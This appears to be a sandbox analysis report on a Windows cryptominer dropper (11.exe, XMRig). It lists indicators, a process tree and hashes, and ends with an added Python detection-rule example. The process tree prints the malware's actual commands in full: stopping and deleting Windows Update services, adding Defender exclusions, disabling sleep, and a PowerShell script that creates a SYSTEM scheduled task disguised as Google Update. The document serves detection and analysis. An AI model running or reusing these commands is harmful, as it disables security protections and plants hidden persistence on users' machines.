Analysis
-
max time kernel: 300s
max time network: 296s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 25-09-2022 11:52
Behavioral task: behavioral1
Sample: 11.exe
Resource: win7-20220812-en
General
-
Target: 11.exe
Size: 7.0MB
MD5: b76c48fd62b955eea124b76e3e1eddf0
SHA1: 40ac78ddd36295c7abf81e9e1405f2e75953ab17
SHA256: 2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2
SHA512: 9e5b59f61a2a1812923110cedd3fe85c9f0e8332450f89a625b525786d0705e8e5f90067c38f8ed73ef1eb446871dbeda8906edba8cb0e4d1893577cf6a85209
SSDEEP: 196608:Zff6pVbPXSxEieA3Rry41AjbZLKjewctp28CWcDdod0Xi6P:VypUxRrP1KIePp2jWcy0XiE
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes: reg.exe
  Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters   reg.exe
  Key deleted   \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security     reg.exe
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes: 11.exe, updater.exe
  Key opened    \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__   11.exe
  Key opened    \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__   updater.exe
-
XMRig Miner payload 2 IoCs
Processes: memory regions of conhost.exe (PID 2044)
  behavioral1/memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp   yara rule: xmrig
  behavioral1/memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp   yara rule: xmrig
-
Drops file in Drivers directory 2 IoCs
Processes: 11.exe, updater.exe
  File created  C:\Windows\system32\drivers\etc\hosts   11.exe
  File created  C:\Windows\system32\drivers\etc\hosts   updater.exe
-
Executes dropped EXE 1 IoCs
Processes: updater.exe
  pid 1532   updater.exe
Stops running service(s) 3 TTPs
-
UPX-packed payload (yara rule: upx) 2 IoCs
Processes: the same conhost.exe (PID 2044) regions that matched xmrig above
  behavioral1/memory/2044-166-0x0000000140000000-0x00000001407F4000-memory.dmp   yara rule: upx
  behavioral1/memory/2044-168-0x0000000140000000-0x00000001407F4000-memory.dmp   yara rule: upx
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: updater.exe, 11.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion    updater.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion   11.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion    11.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion   updater.exe
-
Loads dropped DLL 1 IoCs
Processes: taskeng.exe
  pid 292   taskeng.exe
-
Themida-protected executable (yara rule: themida) 20 IoCs
Processes: 11.exe (PID 1604), updater.exe (PID 1532) and the dropped updater.exe on disk
  behavioral1/memory/1604-54-0x000000013F650000-0x00000001402FB000-memory.dmp   themida
  behavioral1/memory/1604-{55,56,57,58,59,60,80,100}-0x000000013F650000-0x00000001402FB000-memory.dmp   themida (same region, eight further snapshots)
  \Program Files\Google\Chrome\updater.exe   themida
  C:\Program Files\Google\Chrome\updater.exe   themida (listed twice)
  behavioral1/memory/1532-114-0x000000013F9E0000-0x000000014068B000-memory.dmp   themida
  behavioral1/memory/1532-{115,116,118,119,120,153,164}-0x000000013F9E0000-0x000000014068B000-memory.dmp   themida (same region, seven further snapshots)
-
Checks whether UAC is enabled 2 IoCs
Processes: 11.exe, updater.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   11.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA   updater.exe
Drops file in System32 directory 2 IoCs
Processes: powershell.exe (two instances)
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk   powershell.exe
  File opened for modification  (same path)   powershell.exe
  This is the PowerShell host updating its own Start Menu shortcut (note the unexpanded %ProgramData% in the recorded path); treat it as console noise rather than a file written by the sample.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: 11.exe, updater.exe
  pid 1604   11.exe
  pid 1532   updater.exe
-
Suspicious use of SetThreadContext 2 IoCs
Processes: updater.exe
  PID 1532 updater.exe set thread context of PID 2012 conhost.exe
  PID 1532 updater.exe set thread context of PID 2044 conhost.exe
-
Drops file in Program Files directory 4 IoCs
Processes: cmd.exe, 11.exe, updater.exe, cmd.exe
  File created  C:\Program Files\Google\Libs\g.log          cmd.exe
  File created  C:\Program Files\Google\Chrome\updater.exe   11.exe
  File created  C:\Program Files\Google\Libs\WR64.sys       updater.exe
  File created  C:\Program Files\Google\Libs\g.log          cmd.exe
  The report does not identify WR64.sys. A .sys written next to the miner by updater.exe, together with the LoadsDriver entry and the SeLockMemoryPrivilege adjustment in conhost.exe 2044 below, is consistent with XMRig loading its WinRing0 helper driver (MSR access) and enabling large pages; that is an inference, not a finding of this report.
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
  pids 572, 1396, 584, 320, 332, 1320, 1164, 1804, 1952, 1092
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
Processes: powershell.exe, WMIC.exe
  Key created       \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage   powershell.exe
  Set value (data)  \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e0d31739e6d0d801   powershell.exe
  Key created       \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\   WMIC.exe
  The .DEFAULT hive is touched because these children run under the SYSTEM scheduled task (taskeng.exe, S-1-5-18, in the process tree below).
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe (5 instances), conhost.exe
  pid 1260   powershell.exe
  pid 1316   powershell.exe
  pid 1796   powershell.exe
  pid 2040   powershell.exe
  pid 1104   powershell.exe
  pid 2044   conhost.exe (all remaining entries; this is the process holding the XMRig payload)
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
  pid 464   (process name not recorded)
-
Suspicious use of AdjustPrivilegeToken 38 IoCs
Processes: powershell.exe, powercfg.exe, WMIC.exe, conhost.exe
  SeDebugPrivilege      1260 powershell.exe
  SeShutdownPrivilege    364 powercfg.exe
  SeDebugPrivilege      1316 powershell.exe
  SeShutdownPrivilege    572 powercfg.exe
  SeShutdownPrivilege   1140 powercfg.exe
  SeShutdownPrivilege   1380 powercfg.exe
  SeDebugPrivilege      1796 powershell.exe
  SeDebugPrivilege      2040 powershell.exe
  SeShutdownPrivilege   1108 powercfg.exe
  SeDebugPrivilege      1104 powershell.exe
  SeShutdownPrivilege   1760 powercfg.exe
  SeShutdownPrivilege    908 powercfg.exe
  SeShutdownPrivilege   1148 powercfg.exe
  1612 WMIC.exe, each twice: SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
  SeLockMemoryPrivilege 2044 conhost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 11.exe, cmd.exe, cmd.exe, powershell.exe, powershell.exe, taskeng.exe
  Each parent-to-child write below is recorded three times unless noted.
  1604 11.exe         -> 1260 powershell.exe
  1604 11.exe         ->  996 cmd.exe
  1604 11.exe         -> 1252 cmd.exe
  1604 11.exe         -> 1316 powershell.exe
   996 cmd.exe        -> 1164 sc.exe
  1252 cmd.exe        ->  364 powercfg.exe
   996 cmd.exe        -> 1804 sc.exe
   996 cmd.exe        -> 1952 sc.exe
   996 cmd.exe        -> 1092 sc.exe
  1252 cmd.exe        ->  572 powercfg.exe
   996 cmd.exe        ->  584 sc.exe
   996 cmd.exe        -> 1520 reg.exe
  1252 cmd.exe        -> 1140 powercfg.exe
   996 cmd.exe        -> 1480 reg.exe
   996 cmd.exe        -> 1824 reg.exe
   996 cmd.exe        -> 1428 reg.exe
  1252 cmd.exe        -> 1380 powercfg.exe
   996 cmd.exe        -> 1972 reg.exe
  1316 powershell.exe ->  276 schtasks.exe
  1604 11.exe         -> 1796 powershell.exe
  1796 powershell.exe -> 1620 schtasks.exe
   292 taskeng.exe    -> 1532 updater.exe (once)
Processes
-
C:\Users\Admin\AppData\Local\Temp\11.exe  (level 1)
  "C:\Users\Admin\AppData\Local\Temp\11.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 2)
    powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
-
  C:\Windows\system32\cmd.exe  (level 2)
    cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\sc.exe  (level 3)
      sc stop UsoSvc
      - Launches sc.exe
-
    C:\Windows\system32\sc.exe  (level 3)
      sc stop WaaSMedicSvc
      - Launches sc.exe
-
    C:\Windows\system32\sc.exe  (level 3)
      sc stop wuauserv
      - Launches sc.exe
-
    C:\Windows\system32\sc.exe  (level 3)
      sc stop bits
      - Launches sc.exe
-
    C:\Windows\system32\sc.exe  (level 3)
      sc stop dosvc
      - Launches sc.exe
-
    C:\Windows\system32\reg.exe  (level 3)
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
    C:\Windows\system32\reg.exe  (level 3)
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
    C:\Windows\system32\reg.exe  (level 3)
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      - Modifies security service
-
    C:\Windows\system32\reg.exe  (level 3)
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
    C:\Windows\system32\reg.exe  (level 3)
      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
  C:\Windows\system32\cmd.exe  (level 2)
    cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\powercfg.exe  (level 3)
      powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\powercfg.exe  (level 3)
      powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\powercfg.exe  (level 3)
      powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\powercfg.exe  (level 3)
      powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 2)
    powershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    The version gate (6.2 is Windows 8) selects schtasks.exe on systems without the ScheduledTasks module and Register-ScheduledTask elsewhere, both as SYSTEM with highest run level; without administrator rights it falls back to an HKCU Run value. As rendered here the Windows 7 branch is a bare string literal, which PowerShell would merely output, yet this process (PID 1316) did spawn schtasks.exe (PID 276) with exactly that command, so the rendering is not byte-exact.
-
    C:\Windows\system32\schtasks.exe  (level 3)
      "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
      - Creates scheduled task(s)
-
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 2)
    powershell <#khtnr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
-
    C:\Windows\system32\schtasks.exe  (level 3)
      "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
-
C:\Windows\system32\taskeng.exe  (level 1)
  taskeng.exe {67A561F8-0A9F-4B32-BA57-A4D704C276B6} S-1-5-18:NT AUTHORITY\System:Service:
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
-
  C:\Program Files\Google\Chrome\updater.exe  (level 2)
    "C:\Program Files\Google\Chrome\updater.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
-
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 3)
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\cmd.exe  (level 3)
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
      C:\Windows\system32\sc.exe  (level 4)
        sc stop UsoSvc
        - Launches sc.exe
-
      C:\Windows\system32\sc.exe  (level 4)
        sc stop WaaSMedicSvc
        - Launches sc.exe
-
      C:\Windows\system32\sc.exe  (level 4)
        sc stop wuauserv
        - Launches sc.exe
-
      C:\Windows\system32\sc.exe  (level 4)
        sc stop bits
        - Launches sc.exe
-
      C:\Windows\system32\sc.exe  (level 4)
        sc stop dosvc
        - Launches sc.exe
-
      C:\Windows\system32\reg.exe  (level 4)
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
      C:\Windows\system32\reg.exe  (level 4)
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
      C:\Windows\system32\reg.exe  (level 4)
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
-
      C:\Windows\system32\reg.exe  (level 4)
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
      C:\Windows\system32\reg.exe  (level 4)
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
    C:\Windows\system32\cmd.exe  (level 3)
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
      C:\Windows\system32\powercfg.exe  (level 4)
        powercfg /x -hibernate-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\system32\powercfg.exe  (level 4)
        powercfg /x -hibernate-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\system32\powercfg.exe  (level 4)
        powercfg /x -standby-timeout-dc 0
        - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\system32\powercfg.exe  (level 4)
        powercfg /x -standby-timeout-ac 0
        - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (level 3)
      powershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
-
      C:\Windows\system32\schtasks.exe  (level 4)
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
        - Creates scheduled task(s)
-
    C:\Windows\system32\conhost.exe  (level 3)
      C:\Windows\system32\conhost.exe lhmcarocyjvzk
-
      C:\Windows\system32\cmd.exe  (level 4)
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        - Drops file in Program Files directory
-
    C:\Windows\system32\cmd.exe  (level 3)
      cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
      - Drops file in Program Files directory
-
      C:\Windows\System32\Wbem\WMIC.exe  (level 4)
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        - Modifies data under HKEY_USERS
        - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\conhost.exe  (level 3)
      C:\Windows\system32\conhost.exe jftlneyiewlaxjvq GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mVBd6IrnBFdAaSbxamnHt0v75gn2+2heHSc2pqg9laV
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      Both conhost.exe instances (PIDs 2012 and 2044) are the SetThreadContext targets of updater.exe; PID 2044 is where the xmrig and upx YARA rules match and where SeLockMemoryPrivilege is adjusted.
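The process tree above is the whole playbook in plain command lines: stop and delete the update-related services, exclude the user profile and Program Files from Defender, zero the sleep and hibernate timeouts so the miner keeps running, register a SYSTEM scheduled task named to resemble Google Update, and hollow conhost.exe for the payload. The detection logic below is an added example, not part of this report or of any sandbox's rule set: it evaluates Sysmon Event ID 1 / Security 4688 style process-creation records against five rules derived from those command lines. The event records, the allow-list of legitimate Google Update task names and the accepted forms of a conhost.exe command line are assumptions made for the example; the command lines themselves are copied from the tree.

```python
"""Process-creation detections for the tree above (added example, not the report's rules).
Events are Sysmon ID 1 / 4688 style records constructed for the demo; the command
lines are copied from the report, the allow-lists are assumptions (see comments)."""
import re
from dataclasses import dataclass

# Services the sample stops and deletes (Update Orchestrator, WaaS Medic,
# Windows Update, BITS, Delivery Optimization).
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
# Assumption: the only legitimate GoogleUpdateTaskMachine* names, both running GoogleUpdate.exe.
GOOGLE_TASKS = {"googleupdatetaskmachinecore", "googleupdatetaskmachineua"}
# Assumption: a legitimate conhost.exe carries "0x<handle> -ForceV1" (Windows 8+)
# or a quoted digits-and-hyphens token (Windows 7).
CONHOST_OK = re.compile(r'^(0x[0-9a-fA-F]+\s+-ForceV1|"[-\d]+")$')


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str      # full path of the created process
    cmdline: str


def _name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _args(ev):
    """Command line minus its first (program) token."""
    m = re.match(r'\s*("[^"]*"|\S+)\s*(.*)$', ev.cmdline, re.S)
    return m.group(2).strip() if m else ""


def rule_update_service_tamper(ev):
    name, args = _name(ev.image), _args(ev)
    if name == "sc.exe":
        m = re.match(r"(?i)(stop|delete|config)\s+(\S+)", args)
        return bool(m) and m.group(2).lower() in UPDATE_SERVICES
    if name == "reg.exe":
        m = re.match(r'(?i)delete\s+"?HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)'
                     r'\\Services\\([^"\\\s]+)', args)
        return bool(m) and m.group(1).lower() in UPDATE_SERVICES
    return False


def rule_defender_exclusion(ev):
    c = ev.cmdline.lower()
    return (_name(ev.image) in ("powershell.exe", "pwsh.exe")
            and "add-mppreference" in c and "-exclusion" in c)


def rule_power_timeout_zeroed(ev):
    return (_name(ev.image) == "powercfg.exe" and re.search(
        r"(?i)/x\s+-(hibernate|standby|monitor)-timeout-(ac|dc)\s+0\b", ev.cmdline) is not None)


def rule_fake_google_update_task(ev):
    args = _args(ev)
    if _name(ev.image) != "schtasks.exe" or not re.match(r"(?i)/create\b", args):
        return False
    tn = re.search(r"""(?i)/tn\s+["']*([^\s"']+)""", args)
    tr = re.search(r"""(?i)/tr\s+("[^"]*"|'[^']*'|\S+)""", args)
    if not tn or not tr:
        return False
    task, target = tn.group(1).lower(), tr.group(1).strip("\"' ").lower()
    if not task.startswith("googleupdatetaskmachine"):
        return False
    # Legitimate only if the name is known and the action is GoogleUpdate.exe.
    return task not in GOOGLE_TASKS or "googleupdate.exe" not in target


def rule_conhost_odd_cmdline(ev):
    return _name(ev.image) == "conhost.exe" and CONHOST_OK.match(_args(ev)) is None


RULES = {
    "update_service_tamper": rule_update_service_tamper,
    "defender_exclusion": rule_defender_exclusion,
    "power_timeout_zeroed": rule_power_timeout_zeroed,
    "fake_google_update_task": rule_fake_google_update_task,
    "conhost_odd_cmdline": rule_conhost_odd_cmdline,
}


def evaluate(events):
    """pid -> sorted names of the rules that fired on that process."""
    hits = {}
    for ev in events:
        fired = sorted(name for name, rule in RULES.items() if rule(ev))
        if fired:
            hits[ev.pid] = fired
    return hits


def verdict(events, threshold=3):
    """(flagged, distinct rules): three distinct rules in one batch is the
    update-killer-plus-miner pattern, not an administrator's one-off."""
    distinct = sorted({n for fired in evaluate(events).values() for n in fired})
    return len(distinct) >= threshold, distinct


UPDATER = r"C:\Program Files\Google\Chrome\updater.exe"
SAMPLE_EVENTS = [  # constructed records; command lines copied from the report
    ProcEvent(1164, r"C:\Windows\system32\sc.exe", "sc stop wuauserv"),
    ProcEvent(1480, r"C:\Windows\system32\reg.exe",
              r'reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f'),
    ProcEvent(1260, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"),
    ProcEvent(364, r"C:\Windows\system32\powercfg.exe", "powercfg /x -hibernate-timeout-ac 0"),
    ProcEvent(276, r"C:\Windows\system32\schtasks.exe",
              f'"C:\\Windows\\system32\\schtasks.exe" /create /f /sc onlogon /rl highest '
              f'/ru System /tn GoogleUpdateTaskMachineQC /tr "\'{UPDATER}\'"'),
    ProcEvent(2012, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe lhmcarocyjvzk"),
    # benign controls (constructed): normal conhost, unrelated service stop, the real Google task
    ProcEvent(900, r"C:\Windows\system32\conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(901, r"C:\Windows\system32\sc.exe", "sc stop Spooler"),
    ProcEvent(902, r"C:\Windows\system32\schtasks.exe",
              r'schtasks /create /tn GoogleUpdateTaskMachineUA /ru System '
              r'/tr "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler"'),
]

if __name__ == "__main__":
    print(evaluate(SAMPLE_EVENTS), verdict(SAMPLE_EVENTS))
```

The rules are deliberately narrow (update-related services only, the GoogleUpdateTaskMachine* name family only) so that an administrator stopping the spooler or Google's own updater does not trip them; the batch verdict is what turns five low-value hits into a miner-dropper finding. SetThreadContext and the YARA memory matches come from different telemetry and are not modelled here.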
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files\Google\Chrome\updater.exe (listed three times with identical hashes, once as \Program Files\Google\Chrome\updater.exe)
  Filesize: 7.0MB
  MD5:    0b1c9cde6b467847472545263c58791c
  SHA1:   3acaf0cefda3ab7e43c18a8eb17ec69477cc36a8
  SHA256: 394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14
  SHA512: 276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02
  Same size and packer as 11.exe but a different file: hash indicators for the dropper alone will not match the persisted copy.
-
C:\Program Files\Google\Libs\g.log (output of the wmic Win32_VideoController query)
  Filesize: 198B
  MD5:    37dd19b2be4fa7635ad6a2f3238c4af1
  SHA1:   e5b2c034636b434faee84e82e3bce3a3d3561943
  SHA256: 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
  SHA512: 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (Explorer jump-list file of the Admin user; listed twice, identical)
  Filesize: 7KB
  MD5:    0a07e4be67bec11b525795ea15cd0e80
  SHA1:   e62e2c165f3466e487babbfa9e2a16b583e9a84a
  SHA256: 65462903c650e37ba468b4b9d260f58b4b93c0fd98b3c525df22a58a96943af1
  SHA512: aad1aabbe8586f20435e8dac3768fa42652ed6583267b2f04f5c786345b9c069bcb3d4060cabb08f9318141dd427acec00d91fef329479cf64be6644638e3690
-
C:\Windows\system32\drivers\etc\hosts (rewritten by both 11.exe and updater.exe; the report does not show its content)
  Filesize: 2KB
  MD5:    4414f1125d1d6f86a7588f226996a8e6
  SHA1:   1bb04893c1e093f8ab7880144bf2d720bd56ca03
  SHA256: 3187ae368d15b7a1cfbb7b2c1338464ab40586b9432b6b4d259c67e0e9fe9d7e
  SHA512: 01f6158e1f562f63b0e5f17dfe8cd8ad8e8db8c41bca94dbb0dc551c68ba923aa5708c0c7f8ce39c287aaa5dd713ec74f347c10d9dec8eaab9ecd170fd6b9c80
-
